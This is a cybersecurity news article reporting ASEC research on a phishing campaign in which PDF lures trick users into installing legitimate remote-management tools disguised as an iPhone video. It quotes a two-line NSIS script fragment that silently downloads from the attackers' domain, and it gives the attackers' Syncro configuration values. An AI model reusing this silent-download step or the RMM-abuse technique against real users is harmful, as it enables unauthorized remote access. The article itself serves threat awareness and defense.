Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Reduce Alert Fatigue to Improve SOC Efficiency and Cut Business Costs
July 1, 2026
Apple Hide My Email Flaw Exposed Real User Email Addresses
July 1, 2026
Critical Fluentd Vulnerabilities Allow Remote Code Execution
July 1, 2026
Home/Threats/Threat Actors Leveraging RMM Tools to Attack Users via Weaponized PDF Files
Threats

Threat Actors Leveraging RMM Tools to Attack Users via Weaponized PDF Files

Threat actors have launched a new wave of cyberattacks, leveraging weaponized PDF files to trick users into installing remote monitoring and management (RMM) tools on their systems. These attacks...

Emy Elsamnoudy
Emy Elsamnoudy
January 13, 2026 3 Min Read
48 0

Threat actors have launched a new wave of cyberattacks, leveraging weaponized PDF files to trick users into installing remote monitoring and management (RMM) tools on their systems.

These attacks exploit the trusted nature of RMM software like Syncro, SuperOps, NinjaOne, and ConnectWise ScreenConnect to gain unauthorized access to victim machines.

The malicious PDF documents are disguised with file names such as “Invoice,” “Product Order,” and “Payment,” suggesting they are being distributed through phishing email campaigns targeting businesses and individuals alike.

When users open these PDF files, they encounter either a high-quality image that prevents preview or an error message stating “Failed to load PDF document.”

Both scenarios prompt victims to click on a link that redirects them to fake Google Drive pages or fraudulent websites impersonating Adobe.

The fake Google Drive page displays what appears to be a video file named “Video_recorded_on_iPhone17.mp4,” which is actually an RMM installer in disguise.

The downloaded file maintains the deceptive naming pattern “Video_recorded_on_iPhone17.mp4 Drive.google.com” to further convince users they are downloading a legitimate video.

ASEC researchers identified that these attacks have been ongoing since at least October 2025, based on digital certificates used to sign the malicious installers.

The threat actor behind this campaign has been systematically distributing multiple RMM tools, all signed with the same valid certificate to evade detection by security products.

The PDF malware used in the attack – 1 (Source - ASEC)
The PDF malware used in the attack – 1 (Source – ASEC)

This approach allows the attackers to bypass traditional security measures, as RMM tools are designed for legitimate administrative purposes and are not classified as conventional malware like backdoors or Remote Access Trojans.

PDF malware used in the attack – 2 (Source - ASEC)
PDF malware used in the attack – 2 (Source – ASEC)

The attack leverages the inherent trust that security solutions place in RMM software. Since these tools are commonly used by Managed Service Providers and IT teams for legitimate remote administration, firewalls and anti-malware programs often struggle to identify them as threats.

This creates a dangerous blind spot that attackers are actively exploiting to establish persistent remote access to compromised systems.

Technical Breakdown of the Infection Mechanism

The infection process begins when the victim downloads what they believe is a video file from the fake Google Drive page.

The downloaded executable is actually an installer created with Advanced Installer or NSIS that deploys the RMM tool on the target system.

Syncro’s website (Source - ASEC)
Syncro’s website (Source – ASEC)

For Syncro RMM installations, the malware uses specific parameters during execution, including a “key” value of “yK0UAOaHHwdbYDOp_sr51w” and a “customerid” of “1709830.”

These configuration details allow the threat actor to identify and remotely control infected machines through the RMM platform’s legitimate infrastructure.

Screen of the Google Drive phishing page (Source - ASEC)
Screen of the Google Drive phishing page (Source – ASEC)

The NSIS-based downloader variant contains embedded scripts that fetch additional payloads from attacker-controlled servers. The malicious NSI script executes commands like:

StrCpy $0 $TEMPtemp_response.html
INetC::get/silent https://anhemvn124.com $0

This command silently downloads files from the malicious domain and prepares the system for further compromise. The installer then deploys NinjaOne RMM using Windows Installer with quiet mode execution to avoid user detection.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackExploitMalwarephishingSecurityThreat

Share Article

Emy Elsamnoudy

Emy Elsamnoudy

Emy is a cybersecurity analyst and reporter specializing in threat hunting, defense strategies, and industry trends. With expertise in proactive security measures, Emily covers the tools and techniques organizations use to detect and prevent cyber attacks. She is a regular speaker at security conferences and has contributed to industry reports on threat intelligence and security operations. Emily's reporting focuses on helping organizations improve their security posture through practical, actionable insights.

Previous Post

Hackers Hijacked Apex Legends Game to Control the Inputs of Another Player Remotely

Next Post

Android Banking Malware deVixor Actively Targeting Users with Ransomware Capabilities

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Buffa Rust Library 0-Day DoS Vulnerability in Anthropic
July 1, 2026
Critical Citrix NetScaler ADC and Gateway Bugs Allow DoS, Memory Overflow
July 1, 2026
Critical Vulnerability in Windows Drivers Lets Attackers Disable Security Software
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us